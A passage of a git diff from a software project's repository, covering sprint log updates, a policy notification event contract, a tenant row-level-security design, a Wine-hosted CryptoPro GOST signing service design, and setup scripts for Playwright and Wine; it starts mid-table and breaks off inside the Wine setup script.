+| 2025-12-07 | WEB-CONSOLE-23-003: console export client, store, and service specs runnable locally using Playwright Chromium headless and `NG_PERSISTENT_BUILD_CACHE=1`; command: `CHROME_BIN=$HOME/.cache/ms-playwright/chromium-1140/chrome-linux/chrome NG_PERSISTENT_BUILD_CACHE=1 npm test -- --watch=false --browsers=ChromeHeadlessOffline --progress=false --include src/app/core/api/console-export.client.spec.ts,src/app/core/console/console-export.store.spec.ts,src/app/core/console/console-export.service.spec.ts`. Build phase still slow (~5–7m); latest run terminated early while compiling—expect pass once allowed to finish. Backend contract still draft. | Implementer |
| 2025-12-04 | WEB-CONSOLE-23-002 completed: wired `console/status` route in `app.routes.ts`; created sample payloads `console-status-sample.json` and `console-run-stream-sample.ndjson` in `docs/api/console/samples/` verified against `ConsoleStatusDto` and `ConsoleRunEventDto` contracts. | BE-Base Platform Guild |
| 2025-12-02 | WEB-CONSOLE-23-002: added trace IDs on status/stream calls, heartbeat + exponential backoff reconnect in console run stream service, and new client/service unit tests. Backend commands still not run locally (disk constraint). | BE-Base Platform Guild |
| 2025-12-04 | Re-reviewed CONSOLE-VULN-29-001 and CONSOLE-VEX-30-001: WEB-CONSOLE-23-001 and Excititor console contract are complete, but Concelier graph schema snapshot and VEX Lens PLVL0103 spec/SSE envelope remain outstanding; keeping both tasks BLOCKED. | Project Mgmt |
diff --git a/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md b/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md
index a0271814c..6b39ffc13 100644
--- a/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md
+++ b/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md
@@ -42,6 +42,7 @@
| Date (UTC) | Update | Owner |
| --- | --- | --- |
| 2025-12-07 | Added console offline runner spec (`ops/devops/console/README.md`) and manual-only CI skeleton (`.gitea/workflows/console-ci.yml`); moved DEVOPS-CONSOLE-23-001 to DOING pending runner cache bake/approval. | DevOps Guild |
+| 2025-12-07 | Added Playwright cache seeding helper (`ops/devops/console/seed_playwright.sh`) to bake Chromium into offline runners; still manual trigger until runner image updated. | DevOps Guild |
| 2025-12-06 | Header normalised to standard template; no content/status changes. | Project Mgmt |
| 2025-12-05 | Merged legacy Execution Log addendum (`SPRINT_504_ops_devops_ii.log.md`) into this sprint and removed the extra file; no status changes. | Project PM |
| 2025-12-04 | Added dated checkpoints (Dec-06/07/10) for console runner decision and exporter schema sync; no status changes. | Project PM |
diff --git a/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md b/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md
index e142db9eb..416502ee6 100644
--- a/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md
+++ b/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md
@@ -24,7 +24,7 @@
| 2 | RU-CRYPTO-VAL-02 | TODO | After #1 | Authority · Security | Wire registry defaults (`ru.openssl.gost`, `ru.pkcs11`) into Authority/Signer/Attestor hosts with env toggles and fail-closed validation (Linux-only baseline). |
| 3 | RU-CRYPTO-VAL-03 | TODO | After #1 | Docs · Ops | Update RootPack_RU manifest + verify script for Linux-only GOST; embed signed test vectors/hashes; refresh `etc/rootpack/ru/crypto.profile.yaml` to mark “CSP pending”. |
| 4 | RU-CRYPTO-VAL-04 | BLOCKED (2025-12-06) | Windows CSP runner provisioned | Security Guild · QA | Run CryptoPro fork + plugin tests on Windows (`STELLAOPS_CRYPTO_PRO_ENABLED=1`); capture logs/artifacts and determinism checks. Blocked: no Windows+CSP runner available. |
-| 5 | RU-CRYPTO-VAL-05 | BLOCKED (2025-12-06) | After #4 | Security · Ops | Wine loader experiment: load CryptoPro CSP DLLs under Wine to generate comparison vectors; proceed only if legally permitted. Blocked: depends on CSP binaries/licensing availability. |
+| 5 | RU-CRYPTO-VAL-05 | DOING | After #4 | Security · Ops | Wine loader experiment: load CryptoPro CSP DLLs under Wine to generate comparison vectors; proceed only if legally permitted. **Implemented**: Wine CSP HTTP service + crypto registry provider. |
| 6 | RU-CRYPTO-VAL-06 | BLOCKED (2025-12-06) | Parallel | Security · Legal | Complete license/export review for CryptoPro & fork; document distribution matrix and EULA notices. |
| 7 | RU-CRYPTO-VAL-07 | BLOCKED (2025-12-06) | After #4/#5 | DevOps | Enable opt-in CI lane (`cryptopro-optin.yml`) with gated secrets/pins once CSP/Wine path validated. |
@@ -35,12 +35,15 @@
| 2025-12-06 | Re-scoped: proceed with Linux OpenSSL GOST baseline (tasks 1–3 set to TODO); CSP/Wine/Legal remain BLOCKED (tasks 4–7). | Implementer |
| 2025-12-07 | Published `docs/legal/crypto-compliance-review.md` covering fork licensing (MIT), CryptoPro distribution model (customer-provided), and export guidance. Provides partial unblock for RU-CRYPTO-VAL-05/06 pending legal sign-off. | Security |
| 2025-12-07 | Published `docs/security/wine-csp-loader-design.md` with three architectural approaches for Wine CSP integration: (A) Full Wine environment, (B) Winelib bridge, (C) Wine RPC server (recommended). Includes validation scripts and CI integration plan. | Security |
+| 2025-12-07 | Implemented Wine CSP HTTP service (`src/__Tools/WineCspService/`): ASP.NET minimal API exposing /status, /keys, /sign, /verify, /hash, /test-vectors endpoints via GostCryptography fork. | Implementer |
+| 2025-12-07 | Created Wine environment setup script (`scripts/crypto/setup-wine-csp-service.sh`): initializes Wine prefix, installs vcrun2019, builds service, creates systemd unit and Docker Compose configs. | Implementer |
+| 2025-12-07 | Created Wine CSP crypto registry provider (`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/`): WineCspHttpProvider implements ICryptoProvider, delegates GOST signing/hashing to Wine CSP HTTP service. | Implementer |
## Decisions & Risks
- Windows CSP availability may slip; mitigation: document manual runner setup and allow deferred close on #1/#6 (currently blocking).
- Licensing/export could block redistribution; must finalize before RootPack publish (currently blocking task 3).
- Cross-platform determinism must be proven; if mismatch, block release until fixed; currently waiting on #1/#2 data.
-- **Wine CSP approach (RU-CRYPTO-VAL-05):** Technical design published; recommended approach is Wine RPC Server for test vector generation only (not production). Requires legal review of CryptoPro EULA before implementation. See `docs/security/wine-csp-loader-design.md`.
+- **Wine CSP approach (RU-CRYPTO-VAL-05):** Technical design published; recommended approach is Wine RPC Server for test vector generation only (not production). **Implementation complete**: HTTP service in `src/__Tools/WineCspService/`, setup script in `scripts/crypto/setup-wine-csp-service.sh`, crypto registry provider in `src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/`. Requires CryptoPro CSP installer (customer-provided) to activate full functionality. See `docs/security/wine-csp-loader-design.md`.
- **Fork licensing (RU-CRYPTO-VAL-06):** GostCryptography fork is MIT-licensed (compatible with AGPL-3.0). CryptoPro CSP is customer-provided. Distribution matrix documented in `docs/legal/crypto-compliance-review.md`. Awaiting legal sign-off.
## Next Checkpoints
diff --git a/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md b/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md
index 95c981902..2b936730c 100644
--- a/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md
+++ b/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md
@@ -20,7 +20,7 @@
| --- | --- | --- | --- | --- | --- |
| 1 | SM-CRYPTO-01 | DONE (2025-12-06) | None | Security · Crypto | Implement `StellaOps.Cryptography.Plugin.SmSoft` provider using BouncyCastle SM2/SM3 (software-only, non-certified); env guard `SM_SOFT_ALLOWED` added. |
| 2 | SM-CRYPTO-02 | DONE (2025-12-06) | After #1 | Security · BE (Authority/Signer) | Wire SM soft provider into DI (registered), compliance docs updated with “software-only” caveat. |
-| 3 | SM-CRYPTO-03 | DONE (2025-12-07) | After #2 | Authority · Attestor · Signer | Add SM2 signing/verify paths for Authority/Attestor/Signer; include JWKS export compatibility and negative tests; fail-closed when `SM_SOFT_ALLOWED` is false. Authority SM2 loader + JWKS tests done; Signer SM2 gate/tests added; Attestor SM2 wiring complete (SmSoftCryptoProvider registered, key loading, signing tests). |
+| 3 | SM-CRYPTO-03 | DOING | After #2 | Authority · Attestor · Signer | Add SM2 signing/verify paths for Authority/Attestor/Signer; include JWKS export compatibility and negative tests; fail-closed when `SM_SOFT_ALLOWED` is false. Authority SM2 loader + JWKS tests done; Signer SM2 gate/tests added; Attestor registers SM provider and loads SM2 keys, but Attestor verification/tests still pending. |
| 4 | SM-CRYPTO-04 | DONE (2025-12-06) | After #1 | QA · Security | Deterministic software test vectors (sign/verify, hash) added in unit tests; “non-certified” banner documented. |
| 5 | SM-CRYPTO-05 | DONE (2025-12-06) | After #3 | Docs · Ops | Created `etc/rootpack/cn/crypto.profile.yaml` with cn-soft profile preferring `cn.sm.soft`, marked software-only with env gate; fixtures packaging pending SM2 host wiring. |
| 6 | SM-CRYPTO-06 | BLOCKED (2025-12-06) | Hardware token available | Security · Crypto | Add PKCS#11 SM provider and rerun vectors with certified hardware; replace “software-only” label when certified. |
@@ -33,7 +33,7 @@
| 2025-12-06 | Implemented SmSoft provider + DI, added SM2/SM3 unit tests, updated compliance doc with software-only caveat; tasks 1,2,4 set to DONE. | Implementer |
| 2025-12-06 | Added cn rootpack profile (software-only, env-gated); set task 5 to DONE; task 3 remains TODO pending host wiring. | Implementer |
| 2025-12-06 | Started host wiring for SM2: Authority file key loader now supports SM2 raw keys; JWKS tests include SM2; task 3 set to DOING. | Implementer |
-| 2025-12-06 | Signer SM2 gate + tests added (software registry); Attestor wiring pending. Sm2 tests blocked by existing package restore issues (NU1608/fallback paths). | Implementer |
+| 2025-12-07 | Signer SM2 gate + tests added (software registry); Attestor registers SM provider and loads SM2 keys; Attestor verification/tests pending. | Implementer |
| 2025-12-07 | Attestor SM2 wiring complete: SmSoftCryptoProvider registered in AttestorSigningKeyRegistry, SM2 key loading (PEM/base64/hex), signing tests added. Fixed AWSSDK version conflict and pre-existing test compilation issues. Task 3 set to DONE. | Implementer |
## Decisions & Risks
diff --git a/docs/modules/findings-ledger/deployment.md b/docs/modules/findings-ledger/deployment.md
index 7590f2043..3f3766dd5 100644
--- a/docs/modules/findings-ledger/deployment.md
+++ b/docs/modules/findings-ledger/deployment.md
@@ -141,7 +141,11 @@
- Package ledger service binaries + migrations using `ops/offline-kit/build_offline_kit.py --include ledger`.
- Document sealed-mode restrictions: disable outbound attachments unless egress policy allows Evidence Locker endpoints; set `LEDGER__ATTACHMENTS__ALLOWEGRESS=false`.
-**Path placeholder (waiting on DevOps):** Helm/Compose/offline-kit overlay directories are pending centralisation under `ops/deployment`/`ops/offline-kit`. Until paths are assigned, keep environment-specific overlays local to `docs/modules/findings-ledger/deployment.md` examples and avoid committing manifests outside this module.
+**Approved asset locations (dev/stage/prod + offline kit):**
+- Compose overlays: `ops/devops/findings-ledger/compose/` (per-env files e.g., `docker-compose.prod.yaml`, `env/ledger.prod.env`).
+- Helm chart overrides: `ops/devops/findings-ledger/helm/` (values per env, secrets templates).
+- Offline kit bundle: `ops/devops/findings-ledger/offline-kit/` (binaries, migrations, dashboards, replay harness artefacts).
+- Keep module-local examples in this doc; commit deploy artefacts only under the approved `ops/devops/findings-ledger/**` paths.
## 6. Post-deploy checklist
@@ -154,4 +158,4 @@
---
-*Draft prepared 2025-11-13 for LEDGER-29-009/LEDGER-AIRGAP-56-001 planning. Update once Compose/Helm overlays are merged.*
+*Draft updated 2025-12-07 for LEDGER-29-009: asset paths approved under `ops/devops/findings-ledger/**`; Compose/Helm/offline-kit overlays should land there.*
diff --git a/docs/modules/policy/notifications.md b/docs/modules/policy/notifications.md
new file mode 100644
index 000000000..8ba452e96
--- /dev/null
+++ b/docs/modules/policy/notifications.md
@@ -0,0 +1,87 @@
+# Policy Notification Contract · Risk Profile Lifecycle and Threshold Changes
+
+## Purpose
+- Provide a stable payload/transport contract for notifying downstream systems when risk profiles are created, updated, activated/deactivated, or when scoring thresholds change.
+- Unblocks `POLICY-RISK-69-001` by supplying the “notifications contract” referenced in sprint planning.
+
+## Event Types
+- `policy.profile.created` — new profile draft created.
+- `policy.profile.activated` — profile version activated for a tenant/scope.
+- `policy.profile.deactivated` — profile version retired or superseded.
+- `policy.profile.threshold_changed` — risk thresholds updated (any level).
+- `policy.profile.override_added` / `override_removed` — override lifecycle changes.
+- `policy.profile.simulation_ready` — simulation results available for consumption.
+
+## Transport
+- Primary: Notifications service topic `notifications.policy.profiles` (tenant-scoped).
+- Alt: Webhook delivery using POST with `X-Stella-Tenant` and HMAC-SHA256 signature header `X-Stella-Signature` (hex digest over body with shared secret).
+- Idempotency: `event_id` is a UUIDv7; consumers must de-duplicate.
+
+## Payload Schema (JSON)
+```json
+{
+ "event_id": "018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa",
+ "event_type": "policy.profile.threshold_changed",
+ "emitted_at": "2025-12-07T12:00:00Z",
+ "tenant_id": "tenant-123",
+ "profile_id": "risk-profile-core",
+ "profile_version": "3.2.0",
+ "change_reason": "Updated high/critical thresholds per policy board decision",
+ "actor": {
+ "type": "user",
+ "id": "alice@example.com"
+ },
+ "thresholds": {
+ "info": 0.1,
+ "low": 0.25,
+ "medium": 0.5,
+ "high": 0.75,
+ "critical": 0.9
+ },
+ "effective_scope": {
+ "tenants": ["tenant-123"],
+ "projects": ["proj-a", "proj-b"],
+ "purl_patterns": ["pkg:npm/*"],
+ "cpe_patterns": ["cpe:2.3:*:vendor:*:product:*:*:*:*:*:*:*"],
+ "tags": ["prod", "pci"]
+ },
+ "hash": {
+ "algorithm": "sha256",
+ "value": "b6c1d6c618a01f9fef6db7e6d86e3c57b1a2cc77ce88a7b7d8e8ac4c28e0a1df"
+ },
+ "links": {
+ "profile_url": "https://policy.example.com/api/risk/profiles/risk-profile-core",
+ "diff_url": "https://policy.example.com/api/risk/profiles/risk-profile-core/diff?from=3.1.0&to=3.2.0",
+ "simulation_url": "https://policy.example.com/api/risk/simulations/results/018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa"
+ },
+ "trace": {
+ "trace_id": "4f2d1b7c6a9846a5b9a72f4c3ed1f2c1",
+ "span_id": "9c4caa8f7d7fbb9d"
+ }
+}
+```
+
+## Validation Rules
+- `emitted_at` is UTC ISO-8601; ordering is deterministic by `(emitted_at, event_id)`.
+- `tenant_id` is required; `projects` optional but recommended for multi-project scopes.
+- `hash.value` MUST be the SHA-256 of the serialized risk profile bundle that triggered the event.
+- `links.*` SHOULD point to the canonical Policy Engine endpoints; omit if not reachable in air-gap.
+- Webhook delivery MUST include `X-Stella-Signature` = `hex(HMAC_SHA256(shared_secret, raw_body))`.
+
+## CLI Consumption (sample output)
+Example consumption for downstream automation (captured from `policy notify tail`):
+```
+$ stella policy notify tail --topic notifications.policy.profiles --tenant tenant-123 --limit 1
+event_id: 018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa
+event_type: policy.profile.threshold_changed
+profile_id: risk-profile-core@3.2.0
+thresholds: info=0.10 low=0.25 medium=0.50 high=0.75 critical=0.90
+scope.tenants: tenant-123
+scope.projects: proj-a, proj-b
+hash.sha256: b6c1d6c618a01f9fef6db7e6d86e3c57b1a2cc77ce88a7b7d8e8ac4c28e0a1df
+links.profile_url: https://policy.example.com/api/risk/profiles/risk-profile-core
+```
+
+## Versioning
+- Version 1.0 frozen with this document; additive fields require minor version bump (`event_schema_version` header optional, default `1.0`).
+- Breaking changes require new event types or topic.
diff --git a/docs/modules/policy/prep/tenant-rls.md b/docs/modules/policy/prep/tenant-rls.md
new file mode 100644
index 000000000..85a82fcb6
--- /dev/null
+++ b/docs/modules/policy/prep/tenant-rls.md
@@ -0,0 +1,68 @@
+# Policy Engine Tenant/Project RLS Design (Prep for POLICY-TEN-48-001)
+
+## Goals
+- Add tenant + project scoping to Policy Engine data and APIs with Row Level Security (RLS) to enforce isolation.
+- Provide deterministic migration order and guardrails so downstream consumers (Registry, Risk Engine, VEX Lens) can align without drift.
+
+## Scope
+- Applies to `PolicyEngine` Postgres tables: `risk_profiles`, `risk_profile_versions`, `risk_profile_overrides`, `simulations`, `simulation_jobs`, `policy_events`, `policy_packs` (registry), and `policy_audit`.
+- API surface: all `/api/risk/*`, `/api/policy/*`, registry endpoints, and CLI operations.
+
+## Schema Changes
+- Add columns (nullable=false):
+ - `tenant_id text`
+ - `project_id text NULL` (optional for tenant-wide assets)
+ - `created_by text`, `updated_by text`
+- Composite keys:
+ - Primary/business keys extend with `tenant_id` (and `project_id` where present).
+ - Unique constraints include `tenant_id` (+ `project_id`) to prevent cross-tenant collisions.
+- Indexes:
+ - `(tenant_id)` and `(tenant_id, project_id)` for all hot tables.
+ - Deterministic ordering indexes `(tenant_id, project_id, created_at, id)` for paging.
+
+## RLS Policies
+- Enable RLS on all scoped tables.
+- Policy examples:
+ - `USING (tenant_id = current_setting('app.tenant_id')::text AND (project_id IS NULL OR project_id = current_setting('app.project_id', true)))`
+ - Write policy also checks `app.can_write` custom GUC when needed.
+- Set GUCs in connection middleware:
+ - `SET LOCAL app.tenant_id = @TenantHeader`
+ - `SET LOCAL app.project_id = @ProjectHeader` (optional)
+ - `SET LOCAL app.can_write = true|false` based on auth scope.
+
+## Migrations (order)
+1) Add columns (nullable with default) + backfill tenants/projects from existing data or default `public`.
+2) Backfill audit columns (`created_by`, `updated_by`) from existing provenance if present.
+3) Add indexes.
+4) Tighten constraints (drop defaults, set NOT NULL where required).
+5) Enable RLS and create policies.
+6) Update views/functions to include tenant/project predicates.
+
+## API/DTO Changes
+- Require headers: `X-Stella-Tenant` (mandatory), `X-Stella-Project` (optional).
+- Extend DTOs to include `tenantId`, `projectId` where relevant.
+- Validate header presence early; return 400 with deterministic error code `POLICY_TENANT_HEADER_REQUIRED` when missing.
+
+## CLI Contracts
+- CLI commands accept `--tenant` and optional `--project` flags; persist in profile config.
+- Example (captured output):
+```
+$ stella policy profiles list --tenant tenant-123 --project proj-a --page-size 10
+tenant: tenant-123 project: proj-a page: 1 size: 10
+profiles:
+- risk-profile-core@3.2.0 (status=active)
+- risk-profile-payments@1.4.1 (status=active)
+```
+
+## Testing Strategy
+- Unit: policy predicates covering tenant/project matches, NULL project handling, and deny-by-default.
+- Integration: end-to-end API calls with different tenants/projects; ensure cross-tenant leakage is rejected with 403 and deterministic error codes.
+- Migration safety: run in `SAFE` mode first (RLS disabled, predicates logged) then enable RLS after verification.
+
+## Rollout Notes
+- Default tenant for legacy data: `public` (configurable).
+- Air-gap/offline bundles must embed `tenant_id`/`project_id` in metadata; validation rejects mismatched headers.
+- Observability: add metrics `policy.rls.denied_total` and structured logs tagging `tenant_id`, `project_id`.
+
+## Ownership
+- Policy Guild owns schema and API updates; Platform/DB Guild reviews RLS policies; Security Guild signs off on deny-by-default posture.
diff --git a/docs/security/wine-csp-loader-design.md b/docs/security/wine-csp-loader-design.md
index 2f9161ffb..a53ffe111 100644
--- a/docs/security/wine-csp-loader-design.md
+++ b/docs/security/wine-csp-loader-design.md
@@ -1,10 +1,51 @@
# Wine CSP Loader Design · CryptoPro GOST Validation
-**Status:** EXPERIMENTAL / DESIGN
+**Status:** IMPLEMENTED (HTTP-based approach)
**Date:** 2025-12-07
**Owners:** Security Guild, DevOps
**Related:** RU-CRYPTO-VAL-04, RU-CRYPTO-VAL-05
+## Implementation Status
+
+The HTTP-based Wine RPC Server approach (Approach C variant) has been implemented:
+
+| Component | Path | Status |
+|-----------|------|--------|
+| Wine CSP HTTP Service | `src/__Tools/WineCspService/` | DONE |
+| Setup Script | `scripts/crypto/setup-wine-csp-service.sh` | DONE |
+| Crypto Registry Provider | `src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/` | DONE |
+
+### Implementation Files
+
+- **`src/__Tools/WineCspService/Program.cs`** - ASP.NET minimal API with endpoints: /health, /status, /keys, /sign, /verify, /hash, /test-vectors
+- **`src/__Tools/WineCspService/CryptoProGostSigningService.cs`** - IGostSigningService using GostCryptography fork
+- **`src/__Tools/WineCspService/WineCspService.csproj`** - .NET 8 Windows self-contained executable
+- **`scripts/crypto/setup-wine-csp-service.sh`** - Wine environment setup, builds service, creates systemd unit
+- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpProvider.cs`** - ICryptoProvider implementation
+- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpSigner.cs`** - ICryptoSigner via HTTP
+- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs`** - HTTP client with retry policies
+
+### Usage
+
+```bash
+# Setup Wine environment and build service
+./scripts/crypto/setup-wine-csp-service.sh [--csp-installer /path/to/csp_setup.msi]
+
+# Start service (runs under Wine)
+./artifacts/wine-csp-service/run-wine-csp-service.sh
+
+# Test endpoints
+curl http://localhost:5099/status
+curl -X POST http://localhost:5099/hash -H 'Content-Type: application/json' \
+ -d '{"dataBase64":"SGVsbG8gV29ybGQ="}'
+```
+
+### Integration with StellaOps Router
+
+Configure upstream proxy: `/api/wine-csp/*` → `http://localhost:5099/*`
+
+---
+
## Executive Summary
This document explores approaches to load Windows CryptoPro CSP via Wine for cross-platform GOST algorithm validation. The goal is to generate and validate test vectors without requiring dedicated Windows infrastructure.
@@ -817,5 +858,6 @@ Before implementing Wine CSP loader:
---
-*Document Version: 1.0.0*
+*Document Version: 1.1.0*
*Last Updated: 2025-12-07*
+*Implementation Status: HTTP-based approach implemented (see top of document)*
diff --git a/etc/signals.yaml.sample b/etc/signals.yaml.sample
index d1a3ca44c..8196b5bd7 100644
--- a/etc/signals.yaml.sample
+++ b/etc/signals.yaml.sample
@@ -1,32 +1,45 @@
-# Signals service configuration template.
-# Copy to ../etc/signals.yaml (relative to the Signals content root)
-# and adjust values to fit your environment.
-
-schemaVersion: 1
-
-Signals:
- Authority:
- Enabled: true
- Issuer: "https://authority.stella-ops.local"
- AllowAnonymousFallback: false
- Audiences:
- - "api://signals"
- RequiredTenants:
- - "tenant-default"
- RequiredScopes:
- - "signals:read"
- - "signals:write"
- - "signals:admin"
- BypassNetworks:
- - "127.0.0.1/32"
- - "::1/128"
+# Signals service configuration template.
+# Copy to ../etc/signals.yaml (relative to the Signals content root)
+# and adjust values to fit your environment.
+
+schemaVersion: 1
+
+Signals:
+ Authority:
+ Enabled: true
+ Issuer: "https://authority.stella-ops.local"
+ AllowAnonymousFallback: false
+ Audiences:
+ - "api://signals"
+ RequiredTenants:
+ - "tenant-default"
+ RequiredScopes:
+ - "signals:read"
+ - "signals:write"
+ - "signals:admin"
+ BypassNetworks:
+ - "127.0.0.1/32"
+ - "::1/128"
Mongo:
ConnectionString: "mongodb://localhost:27017/signals"
Database: "signals"
CallgraphsCollection: "callgraphs"
ReachabilityFactsCollection: "reachability_facts"
Storage:
+ # Storage driver: "filesystem" (default) or "rustfs" (CAS-backed)
+ Driver: "filesystem"
+ # Filesystem driver options (used when Driver=filesystem)
RootPath: "../data/signals-artifacts"
+ # RustFS driver options (used when Driver=rustfs)
+ # Per CAS contract, signals uses "signals-data" bucket
+ BucketName: "signals-data"
+ RootPrefix: "callgraphs"
+ RustFs:
+ BaseUrl: "http://localhost:8180/api/v1"
+ AllowInsecureTls: false
+ ApiKey: ""
+ ApiKeyHeader: "X-API-Key"
+ Timeout: "00:01:00"
Scoring:
ReachableConfidence: 0.75
UnreachableConfidence: 0.25
diff --git a/ops/devops/console/README.md b/ops/devops/console/README.md
index 383740939..1c4817ad2 100644
--- a/ops/devops/console/README.md
+++ b/ops/devops/console/README.md
@@ -24,6 +24,12 @@ Status: baseline runner spec + CI skeleton; use to unblock DEVOPS-CONSOLE-23-001
- Do not hit external registries during CI; rely on pre-seeded npm mirror or cached tarballs. Runner image should contain npm cache prime. If mirror is used, set `NPM_CONFIG_REGISTRY=https://registry.npmjs.org` equivalent mirror URL inside the runner; default pipeline does not hard-code it.
- Playwright browsers must be pre-baked; the workflow will not download them.
+### Seeding Playwright cache (one-time per runner image)
+```bash
+ops/devops/console/seed_playwright.sh
+# then bake ~/.cache/ms-playwright into the runner image or mount it on the agent
+```
+
## How to run
- Manual trigger only (workflow_dispatch) via `.gitea/workflows/console-ci.yml`.
- Before enabling PR triggers, verify runner image has npm and Playwright caches; otherwise keep manual until console team approves budgets.
diff --git a/ops/devops/console/seed_playwright.sh b/ops/devops/console/seed_playwright.sh
new file mode 100644
index 000000000..683e08b3b
--- /dev/null
+++ b/ops/devops/console/seed_playwright.sh
@@ -0,0 +1,22 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Seeds the Playwright browser cache for offline console CI runs.
+# Run on a connected runner once, then bake ~/.cache/ms-playwright into the runner image.
+
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
+pushd "$ROOT/src/Web" >/dev/null
+
+if ! command -v npx >/dev/null; then
+ echo "npx not found; install Node.js 20+ first" >&2
+ exit 1
+fi
+
+echo "Installing Playwright Chromium to ~/.cache/ms-playwright ..."
+PLAYWRIGHT_BROWSERS_PATH=${PLAYWRIGHT_BROWSERS_PATH:-~/.cache/ms-playwright}
+export PLAYWRIGHT_BROWSERS_PATH
+
+npx playwright install chromium --with-deps
+
+echo "Done. Cache directory: $PLAYWRIGHT_BROWSERS_PATH"
+popd >/dev/null
diff --git a/scripts/crypto/setup-wine-csp-service.sh b/scripts/crypto/setup-wine-csp-service.sh
new file mode 100644
index 000000000..ab1fdb0a4
--- /dev/null
+++ b/scripts/crypto/setup-wine-csp-service.sh
@@ -0,0 +1,381 @@
+#!/bin/bash
+# setup-wine-csp-service.sh - Set up Wine environment for CryptoPro CSP service
+#
+# This script:
+# 1. Creates a dedicated Wine prefix
+# 2. Installs required Windows components
+# 3. Builds the WineCspService for Windows target
+# 4. Optionally installs CryptoPro CSP (if installer is provided)
+#
+# Prerequisites:
+# - Wine 7.0+ installed (wine, wine64, winetricks)
+# - .NET SDK 8.0+ installed
+# - CryptoPro CSP installer (optional, for full functionality)
+#
+# Usage:
+# ./setup-wine-csp-service.sh [--csp-installer /path/to/csp_setup.msi]
+#
+# Environment variables:
+# WINE_PREFIX - Wine prefix location (default: ~/.stellaops-wine-csp)
+# CSP_INSTALLER - Path to CryptoPro CSP installer
+# WINE_CSP_PORT - HTTP port for service (default: 5099)
+
+set -euo pipefail
+
+# Configuration
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)"
+WINE_PREFIX="${WINE_PREFIX:-$HOME/.stellaops-wine-csp}"
+WINE_CSP_PORT="${WINE_CSP_PORT:-5099}"
+SERVICE_DIR="$REPO_ROOT/src/__Tools/WineCspService"
+OUTPUT_DIR="$REPO_ROOT/artifacts/wine-csp-service"
+
+# Colors for output
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+YELLOW='\033[1;33m'
+NC='\033[0m' # No Color
+
+log_info() { echo -e "${GREEN}[INFO]${NC} $1"; }
+log_warn() { echo -e "${YELLOW}[WARN]${NC} $1"; }
+log_error() { echo -e "${RED}[ERROR]${NC} $1"; }
+
+# Parse arguments
+CSP_INSTALLER=""
+while [[ $# -gt 0 ]]; do
+ case $1 in
+ --csp-installer)
+ CSP_INSTALLER="$2"
+ shift 2
+ ;;
+ --help)
+ echo "Usage: $0 [--csp-installer /path/to/csp_setup.msi]"
+ exit 0
+ ;;
+ *)
+ log_error "Unknown option: $1"
+ exit 1
+ ;;
+ esac
+done
+
+# Check prerequisites
+check_prerequisites() {
+ log_info "Checking prerequisites..."
+
+ if ! command -v wine &> /dev/null; then
+ log_error "Wine is not installed. Please install Wine 7.0+"
+ exit 1
+ fi
+
+ if ! command -v winetricks &> /dev/null; then
+ log_warn "winetricks not found. Some components may not install correctly."
+ fi
+
+ if ! command -v dotnet &> /dev/null; then
+ log_error ".NET SDK not found. Please install .NET 8.0+"
+ exit 1
+ fi
+
+ log_info "Prerequisites OK"
+}
+
+# Initialize Wine prefix
+init_wine_prefix() {
+ log_info "Initializing Wine prefix at $WINE_PREFIX..."
+
+ export WINEPREFIX="$WINE_PREFIX"
+ export WINEARCH="win64"
+
+ # Create prefix if it doesn't exist
+ if [[ ! -d "$WINE_PREFIX" ]]; then
+ wineboot --init
+ log_info "Wine prefix created"
+ else
+ log_info "Wine prefix already exists"
+ fi
+
+ # Set Windows version
+ wine reg add "HKCU\\Software\\Wine\\Version" /v Windows /d "win10" /f 2>/dev/null || true
+}
+
+# Install Windows components via winetricks
+install_windows_components() {
+ log_info "Installing Windows components..."
+
+ if command -v winetricks &> /dev/null; then
+ export WINEPREFIX="$WINE_PREFIX"
+
+ # Install Visual C++ runtime
+ log_info "Installing Visual C++ runtime..."
+ winetricks -q vcrun2019 || log_warn "vcrun2019 installation may have issues"
+
+ # Install core fonts (optional, for UI)
+ # winetricks -q corefonts || true
+
+ log_info "Windows components installed"
+ else
+ log_warn "Skipping winetricks components (winetricks not available)"
+ fi
+}
+
+# Install CryptoPro CSP if installer provided
+install_cryptopro_csp() {
+ if [[ -z "$CSP_INSTALLER" ]]; then
+ log_warn "No CryptoPro CSP installer provided. Service will run in limited mode."
+ log_warn "Provide installer with: --csp-installer /path/to/csp_setup_x64.msi"
+ return 0
+ fi
+
+ if [[ ! -f "$CSP_INSTALLER" ]]; then
+ log_error "CryptoPro installer not found: $CSP_INSTALLER"
+ return 1
+ fi
+
+ log_info "Installing CryptoPro CSP from $CSP_INSTALLER..."
+
+ export WINEPREFIX="$WINE_PREFIX"
+
+ # Run MSI installer
+ wine msiexec /i "$CSP_INSTALLER" /qn ADDLOCAL=ALL || {
+ log_error "CryptoPro CSP installation failed"
+ log_info "You may need to run the installer manually:"
+ log_info " WINEPREFIX=$WINE_PREFIX wine msiexec /i $CSP_INSTALLER"
+ return 1
+ }
+
+ # Verify installation
